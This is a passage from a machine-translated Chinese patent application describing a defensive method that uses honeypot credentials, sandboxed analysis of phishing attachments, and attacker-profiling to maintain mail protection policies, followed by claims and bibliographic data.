The honey account number and the password information are sent to the equipment of the attacker through a background interface in a phishing website included in the phishing mail, so that the attacker can be induced to log in the honey account number. Because the honeypot account is a monitored account, when an attacker logs in the honeypot account, the security device can obtain the login record of the honeypot account as attack information of the attacker. In this way, the security device can obtain attack information of an attacker in response to an operation requested by the phishing mail containing link information of the phishing website.
In one embodiment of the invention, the apparatus further comprises:
the address determining module is used for determining an Internet protocol address of an attacker based on at least one of the website code, the network request and the login record of the phishing website;
and the vulnerability scanning module is used for carrying out vulnerability scanning on the Internet protocol address of the attacker, and taking the detected vulnerability as attack information of the attacker.
Thus, vulnerability scanning is carried out on the Internet protocol address of the attacker, vulnerability information of equipment corresponding to the Internet protocol address of the attacker can be obtained, and the vulnerability information is used as attack information of the attacker, so that the variety of the obtained attack information is enriched.
In one embodiment of the present invention, the first attack information obtaining unit is specifically configured to obtain at least one of an internet protocol address, a user agent, a device fingerprint associated with the honeypot account, and an access behavior of the honeypot account, as attack information of the attacker.
Thus, the security device can obtain various information of the attacker, and the obtained attack information is rich and comprehensive as the attack information of the attacker.
In one embodiment of the invention, the phishing mail includes malicious files;
The attack information acquisition module 602 includes:
a file type analysis unit for analyzing the file type of the malicious file;
the file running unit is used for running the malicious files in a sandbox running environment corresponding to the file type, wherein the malicious files comprise computer viruses or files carrying the computer viruses;
the second attack information obtaining unit is used for monitoring the operation behavior of the malicious file, and taking the obtained monitoring result as attack information of the attacker.
In this way, by running the malicious files included in the phishing mail in the virtual sandbox environment, the running behavior of the malicious files can be monitored under the condition that the malicious files cannot cause real attacks, and the obtained monitoring result is used as attack information of an attacker. In this way, the security device can obtain attack information of an attacker in response to an operation requested by the phishing mail containing the malicious file.
In one embodiment of the present invention, the second attack information obtaining unit is specifically configured to monitor a network request generated by running the malicious file, and obtain, based on a monitoring result, an internet protocol address associated with the network request as attack information of the attacker; and/or monitoring an execution path of the backdoor program released by the malicious file, and taking the execution path as attack information of the attacker.
Based on the monitoring of the network request generated by the malicious file, the Internet protocol address associated with the network request is obtained, so that the capability of the security device for obtaining attack information of an attacker can be improved; the execution path of the backdoor program released by the malicious file is determined to be the attack information of the attacker, so that the obtained attack information of the attacker can be enriched.
In one embodiment of the present invention, the second attack information obtaining unit is specifically configured to monitor an operation behavior of the malicious file, and obtain, based on a monitoring result, a file fingerprint of the malicious file and/or registry information of the malicious file as attack information of the attacker.
Thus, based on the running behavior of the malicious file, file fingerprints and registry information of the malicious file are obtained and used as attack information of an attacker, and the obtained attack information of the attacker is enriched.
In one embodiment of the invention, the apparatus further comprises:
the operation monitoring module is used for monitoring the operation of the attacker requesting the target server to execute, and obtaining the attack information of the attacker based on the monitoring result, wherein the target server is: the phishing mail requests a connected virtual server.
Thus, the attack information of the attacker is obtained based on the operation of the attacker on the request of the target server, and the capability of the security device for obtaining the attack information of the attacker can be improved.
In one embodiment of the invention, the apparatus further comprises:
and the information inquiry module is used for inquiring the information matched with the obtained attack information of the attacker in the third-party platform to be used as the attack information of the attacker.
Thus, the attack information of the attacker can be further obtained by inquiring the information matched with the obtained attack information of the attacker in the third-party platform, and the obtained attack information is rich and comprehensive.
In one embodiment of the present invention, the protection policy maintenance module 603 is specifically configured to perform at least one of the following manners: according to the attack information, maintaining an interception strategy of the phishing mails; maintaining a vulnerability restoration strategy according to the attack information; and maintaining an interference attack behavior strategy according to the attack information.
In this way, according to the obtained attack information, different protection strategies are maintained, so that the interception capability of the phishing mail in the mails subsequently received by the protected mailbox can be improved, the loopholes possibly utilized by the malicious files can be repaired, the subsequently received attack behaviors can be counteracted, and the protection capability on network attacks is improved.
In one embodiment of the present invention, the network attack protection module 604 is specifically configured to disconnect the attacker from the attacker's device through an attack protection program; and/or sending false information to the attacker's device through an attack guard.
The attack behavior of the attacker is countered, the network attack by the attacker can be interfered, the attacker is difficult to realize the attack intention, and the protection capability of the network attack is improved.
The embodiment of the present invention further provides an electronic device, as shown in fig. 7, including a processor 701, a communication interface 702, a memory 703 and a communication bus 704, where the processor 701, the communication interface 702, and the memory 703 perform communication with each other through the communication bus 704,
a memory 703 for storing a computer program;
the processor 701 is configured to implement the network attack protection method described in the foregoing method embodiment when executing the program stored in the memory 703.
The communication bus mentioned by the above terminal may be a peripheral component interconnect standard (Peripheral Component Interconnect, abbreviated as PCI) bus or an extended industry standard architecture (Extended Industry Standard Architecture, abbreviated as EISA) bus, etc. The communication bus may be classified as an address bus, a data bus, a control bus, or the like. For ease of illustration, the figures are shown with only one bold line, but not with only one bus or one type of bus.
The communication interface is used for communication between the terminal and other devices.
The memory may include random access memory (Random Access Memory, RAM) or non-volatile memory (non-volatile memory), such as at least one disk memory. Optionally, the memory may also be at least one memory device located remotely from the aforementioned processor.
The processor may be a general-purpose processor, including a central processing unit (Central Processing Unit, CPU for short), a network processor (Network Processor, NP for short), etc.; but also digital signal processors (Digital Signal Processor, DSP for short), application specific integrated circuits (Application Specific Integrated Circuit, ASIC for short), field-programmable gate arrays (Field-Programmable Gate Array, FPGA for short) or other programmable logic devices, discrete gate or transistor logic devices, discrete hardware components.
In yet another embodiment of the present invention, a computer readable storage medium is provided, where a computer program is stored, where the computer program, when executed by a processor, implements the network attack protection method according to the foregoing method embodiment.
In the above embodiments, it may be implemented in whole or in part by software, hardware, firmware, or any combination thereof. When implemented in software, may be implemented in whole or in part in the form of a computer program product. The computer program product includes one or more computer instructions. When loaded and executed on a computer, produces a flow or function in accordance with embodiments of the present invention, in whole or in part. The computer may be a general purpose computer, a special purpose computer, a computer network, or other programmable apparatus. The computer instructions may be stored in or transmitted from one computer-readable storage medium to another, for example, by wired (e.g., coaxial cable, optical fiber, digital Subscriber Line (DSL)), or wireless (e.g., infrared, wireless, microwave, etc.). The computer readable storage medium may be any available medium that can be accessed by a computer or a data storage device such as a server, data center, etc. that contains an integration of one or more available media. The usable medium may be a magnetic medium (e.g., floppy Disk, hard Disk, magnetic tape), an optical medium (e.g., DVD), or a semiconductor medium (e.g., solid State Disk (SSD)), etc.
It is noted that relational terms such as first and second, and the like are used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions. Moreover, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or apparatus that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or apparatus. Without further limitation, an element defined by the phrase "comprising one … …" does not exclude the presence of other like elements in a process, method, article, or apparatus that comprises the element.
In this specification, each embodiment is described in a related manner, and identical and similar parts of each embodiment are all referred to each other, and each embodiment mainly describes differences from other embodiments. In particular, for the apparatus, electronic device and storage medium embodiments, since they are substantially similar to the method embodiments, the description is relatively simple, and references to the parts of the description of the method embodiments are only needed.
The foregoing description is only of the preferred embodiments of the present invention and is not intended to limit the scope of the present invention. Any modification, equivalent replacement, improvement, etc. made within the spirit and principle of the present invention are included in the protection scope of the present invention.

Claims (14)

1. A method for protecting against network attacks, applied to a secure device, the method comprising:
acquiring phishing mails in mails sent to a mailbox protected by mail protection equipment;
responding to the operation of the fishing mail request in the virtual environment, and obtaining attack information of an attacker corresponding to the fishing mail based on the execution result of the operation;
according to the attack information, maintaining a protection strategy;
the maintained protection policy is enforced by the attack protection program.
2. The method of claim 1, wherein the phishing mail includes connection information of a phishing website;
the operation of responding to the fishing mail request in the virtual environment, based on the execution result of the operation, obtains the attack information of the attacker, and comprises the following steps:
analyzing a website code and/or a network request of the phishing website based on the connection information of the phishing website, and identifying a background interface of the phishing website;
Sending monitored honey account number and password information to the attacker equipment through the background interface;
and responding to the attacker to log in the honey account based on the password information, and obtaining a login record of the honey account as attack information of the attacker.
3. The method according to claim 2, wherein the method further comprises:
determining an Internet protocol address of an attacker based on at least one of the website code, the network request and the login record of the phishing website;
and carrying out vulnerability scanning on the Internet protocol address of the attacker, and taking the detected vulnerability as attack information of the attacker.
4. The method according to claim 2, wherein the obtaining the login record of the honeypot account as attack information of the attacker includes:
and obtaining at least one of the Internet protocol address, the user agent, the equipment fingerprint and the access behavior of the honey account, which are associated with the honey account, as attack information of the attacker.
5. The method of claim 1, wherein the phishing mail comprises malicious files, the malicious files comprising computer viruses or files carrying computer viruses;
The operation of responding to the fishing mail request in the virtual environment, based on the execution result of the operation, obtains the attack information of the attacker, and comprises the following steps:
analyzing the file type of the malicious file;
operating the malicious file in a sandbox operating environment corresponding to the file type;
and monitoring the operation behavior of the malicious file, and taking the obtained monitoring result as attack information of the attacker.
6. The method according to claim 5, wherein the monitoring the operation behavior of the malicious file, using the obtained monitoring result as attack information of the attacker, comprises:
monitoring a network request generated by running the malicious file, and acquiring an internet protocol address associated with the network request based on a monitoring result as attack information of the attacker;
and/or
And monitoring an execution path of the backdoor program released by the malicious file, and taking the execution path as attack information of the attacker.
7. The method according to claim 5, wherein the monitoring the operation behavior of the malicious file, using the obtained monitoring result as attack information of the attacker, comprises:
And monitoring the running behavior of the malicious file, and based on a monitoring result, obtaining file fingerprints of the malicious file and/or registry information of the malicious file as attack information of the attacker.
8. The method according to any one of claims 1-7, further comprising:
monitoring the operation of the attacker requesting the target server to execute, and obtaining attack information of the attacker based on a monitoring result, wherein the target server is: the phishing mail requests a connected virtual server.
9. The method according to any one of claims 1-7, further comprising:
and inquiring information matched with the obtained attack information of the attacker in a third-party platform to serve as the attack information of the attacker.
10. The method of claim 1, wherein maintaining a protection policy based on the attack information comprises at least one of:
according to the attack information, maintaining an interception strategy of the phishing mails;
maintaining a vulnerability restoration strategy according to the attack information;
and maintaining an interference attack behavior strategy according to the attack information.
11. The method of claim 10, wherein the executing the maintained protection policy by the attack protection program comprises:
disconnecting the attacker from the attacker's device by an attack guard;
and/or
And sending false information to the equipment of the attacker through the attack protection program.
12. A network attack protection device, the device comprising:
the phishing mail obtaining module is used for obtaining phishing mails in mails sent to a mailbox protected by the mail protecting equipment;
the attack information acquisition module is used for responding to the operation of the fishing mail request in the virtual environment and acquiring attack information of an attacker corresponding to the fishing mail based on the execution result of the operation;
the protection strategy maintenance module is used for maintaining a protection strategy according to the attack information;
and the network attack protection module is used for executing the maintained protection strategy through the attack protection program.
13. The electronic equipment is characterized by comprising a processor, a communication interface, a memory and a communication bus, wherein the processor, the communication interface and the memory are communicated with each other through the communication bus;
A memory for storing a computer program;
a processor for carrying out the method steps of any one of claims 1-11 when executing a program stored on a memory.
14. A computer-readable storage medium, characterized in that the computer-readable storage medium has stored therein a computer program which, when executed by a processor, implements the method steps of any of claims 1-11.
CN202311261640.3A 2023-09-27 2023-09-27 Network attack protection method and device, electronic equipment and storage medium Pending CN117278288A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202311261640.3A CN117278288A (en) 2023-09-27 2023-09-27 Network attack protection method and device, electronic equipment and storage medium

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202311261640.3A CN117278288A (en) 2023-09-27 2023-09-27 Network attack protection method and device, electronic equipment and storage medium

Publications (1)

Publication Number Publication Date
CN117278288A true CN117278288A (en) 2023-12-22

Family

ID=89211880

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202311261640.3A Pending CN117278288A (en) 2023-09-27 2023-09-27 Network attack protection method and device, electronic equipment and storage medium

Country Status (1)

Country Link
CN (1) CN117278288A (en)

Similar Documents

Publication Publication Date Title
US11489855B2 (en) System and method of adding tags for use in detecting computer attacks
CN109684832B (en) System and method for detecting malicious files
US10893059B1 (en) Verification and enhancement using detection systems located at the network periphery and endpoint devices
US11381578B1 (en) Network-based binary file extraction and analysis for malware detection
WO2021077987A1 (en) Security vulnerability defense method and device
RU2680736C1 (en) Malware files in network traffic detection server and method
US8793787B2 (en) Detecting malicious network content using virtual environment components
US7650639B2 (en) System and method for protecting a limited resource computer from malware
EP2754081B1 (en) Dynamic cleaning for malware using cloud technology
US8898788B1 (en) Systems and methods for malware attack prevention
US8539582B1 (en) Malware containment and security analysis on connection
US8850584B2 (en) Systems and methods for malware detection
US20160078229A1 (en) System And Method For Threat Risk Scoring Of Security Threats
US20130133069A1 (en) Silent-mode signature testing in anti-malware processing
US20060259974A1 (en) System and method of opportunistically protecting a computer from malware
JP6134395B2 (en) System and method for risk-based rules for application control
JP2016503936A (en) System and method for identifying and reporting application and file vulnerabilities
US11636208B2 (en) Generating models for performing inline malware detection
US11374946B2 (en) Inline malware detection
RU2661533C1 (en) System and method of detecting the signs of computer attacks
US20220245249A1 (en) Specific file detection baked into machine learning pipelines
CN113824678B (en) System, method, and non-transitory computer readable medium for processing information security events
CN117278288A (en) Network attack protection method and device, electronic equipment and storage medium
EP3999985A1 (en) Inline malware detection
US20240333759A1 (en) Inline ransomware detection via server message block (smb) traffic

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination